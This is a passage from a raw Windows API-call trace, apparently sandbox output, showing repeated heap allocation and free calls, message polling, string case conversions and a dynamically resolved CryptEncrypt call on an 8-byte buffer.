wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9d38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.039] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0268.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0268.040] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1c18*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1c18*, pdwDataLen=0x8bef68*=0x8) returned 1 [0268.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0268.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.042] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.042] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.042] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.042] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.042] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0268.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0268.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0268.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0268.042] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.042] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.042] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0268.042] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.043] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0268.043] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.043] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.043] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0268.043] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.043] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0268.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.044] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.044] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0268.044] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.044] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.044] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0268.044] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.045] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.045] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0268.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0268.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0268.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.045] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.045] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.045] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0268.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0268.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0268.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0268.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0268.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0268.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.047] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0268.047] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0268.047] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0268.047] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.047] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0268.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.047] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.048] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 